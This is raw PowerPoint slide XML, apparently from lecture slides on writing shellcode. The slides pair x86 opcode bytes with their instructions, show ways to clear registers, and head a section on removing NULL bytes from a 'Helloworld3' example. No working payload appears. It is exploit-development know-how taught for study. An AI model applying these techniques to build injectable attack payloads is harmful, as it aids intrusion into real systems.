                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>EB 1E</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dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri Bold" charset="0"/>
                          <a:ea typeface="ヒラギノ角ゴ ProN W6" charset="0"/>
                          <a:cs typeface="ヒラギノ角ゴ ProN W6" charset="0"/>
                          <a:sym typeface="Calibri Bold" charset="0"/>
                        </a:rPr>
                        <a:t>jmp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="16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 short $0x20       ; 128 bytes in either direction</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dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>E9 1E 00 00 00</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dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri Bold" charset="0"/>
                          <a:ea typeface="ヒラギノ角ゴ ProN W6" charset="0"/>
                          <a:cs typeface="ヒラギノ角ゴ ProN W6" charset="0"/>
                          <a:sym typeface="Calibri Bold" charset="0"/>
                        </a:rPr>
                        <a:t>jmp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="16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 $0x23                 ; longer jumps</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5" name="Group 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1762809531"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="852264" y="4104104"/>
          <a:ext cx="7608168" cy="1661160"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1919536"/>
                <a:gridCol w="5688632"/>
              </a:tblGrid>
              <a:tr h="376238">
                <a:tc gridSpan="2">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20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Moving data into a register</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tc hMerge="1">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endParaRPr kumimoji="0" lang="en-US" sz="20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endParaRP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12900" algn="l"/>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>Shell code</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Instruction</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12900" algn="l"/>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="pl-PL" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>B8 04 00 00 00</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Courier New Bold" charset="0"/>
                        <a:cs typeface="Courier New Bold" charset="0"/>
                        <a:sym typeface="Courier New Bold" charset="0"/>
                      </a:endParaRP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dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri Bold" charset="0"/>
                          <a:ea typeface="ヒラギノ角ゴ ProN W6" charset="0"/>
                          <a:cs typeface="ヒラギノ角ゴ ProN W6" charset="0"/>
                          <a:sym typeface="Calibri Bold" charset="0"/>
                        </a:rPr>
                        <a:t>movl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="16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 $0x4,%eax  ; 32 bits</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dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>66 B8 04 00</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dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri Bold" charset="0"/>
                          <a:ea typeface="ヒラギノ角ゴ ProN W6" charset="0"/>
                          <a:cs typeface="ヒラギノ角ゴ ProN W6" charset="0"/>
                          <a:sym typeface="Calibri Bold" charset="0"/>
                        </a:rPr>
                        <a:t>movw</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="16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 $0x4 ,%ax ; 16 bits (we don’t know other 16 bits)</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dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>B0 04</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dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri Bold" charset="0"/>
                          <a:ea typeface="ヒラギノ角ゴ ProN W6" charset="0"/>
                          <a:cs typeface="ヒラギノ角ゴ ProN W6" charset="0"/>
                          <a:sym typeface="Calibri Bold" charset="0"/>
                        </a:rPr>
                        <a:t>movb</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="16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 $0x4,%al   ; 8 bits (we don’t know other 24 bits)</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17116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3" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="119063" indent="-119063"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shell coders arsenal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="40965" name="Group 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87967296"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="852264" y="1484784"/>
          <a:ext cx="7608168" cy="4572000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1919536"/>
                <a:gridCol w="5688632"/>
              </a:tblGrid>
              <a:tr h="3762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20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Instruction</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20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Description</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12900" algn="l"/>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>inc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t> &lt;target&gt;</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Increment the target operand by adding 1 to it.</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12900" algn="l"/>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>dec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t> &lt;target&gt;</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Decrement the target operand by subtracting 1 from it.</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12900" algn="l"/>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>add &lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>dest</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;, &lt;source&gt;</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Add the source operand to the destination operand, storing the result in the destination.</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12900" algn="l"/>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>sub &lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>dest</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;, &lt;source&gt;</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Subtract the source operand from the destination operand, storing the result in the destination.</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12900" algn="l"/>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>or &lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>dest</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;, &lt;source&gt;</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Perform a bitwise or logic operation, comparing each bit of one operand with the corresponding bit of the other operand. The final result is stored in the destination operand.</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12900" algn="l"/>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>and &lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>dest</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;, &lt;source&gt;</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Perform a bitwise and logic operation, comparing each bit of one operand with the corresponding bit of the other operand. The final result is stored in the destination operand. </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12900" algn="l"/>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>xor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t> &lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>dest</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;, &lt;source&gt;</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Perform a bitwise exclusive or (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri Bold" charset="0"/>
                          <a:ea typeface="ヒラギノ角ゴ ProN W6" charset="0"/>
                          <a:cs typeface="ヒラギノ角ゴ ProN W6" charset="0"/>
                          <a:sym typeface="Calibri Bold" charset="0"/>
                        </a:rPr>
                        <a:t>xor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="16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 logical operation, comparing each bit of one operand with the corresponding bit of the other operand. </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73734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smtClean="0"/>
              <a:t>Clearing a 32 bit register (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>ax)</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1340767"/>
            <a:ext cx="8424936" cy="5400601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Adding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>and then subtracting a 32-bit number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0"/>
              <a:t>B8 44 33 22 11        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0"/>
              <a:t> $0x11223344, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0"/>
              <a:t>2D 44 33 22 11        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0"/>
              <a:t> $0x11223344, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" b="0" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0"/>
              <a:t>Shell code cost 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0" smtClean="0"/>
              <a:t>bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" b="0" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Simply subtracting contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> from itself</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="is-IS" b="0" i="1" dirty="0"/>
              <a:t>29 C0               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" b="0" i="1" dirty="0" smtClean="0"/>
              <a:t>subl %eax,%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0" smtClean="0"/>
              <a:t>Shell code is only 2 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0" smtClean="0"/>
              <a:t>Will modify processor flags which are used for branching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="is-IS" b="0" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even simpler version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="is-IS" b="0" dirty="0"/>
              <a:t>31 C0                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" b="0" dirty="0" smtClean="0"/>
              <a:t>xorl %eax,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shell code is only 2 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Will not modify processor flags</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="331805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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Helloworld3</a:t>
            </a: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smtClean="0"/>
              <a:t>Continue removing NULL bytes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="1628839"/>
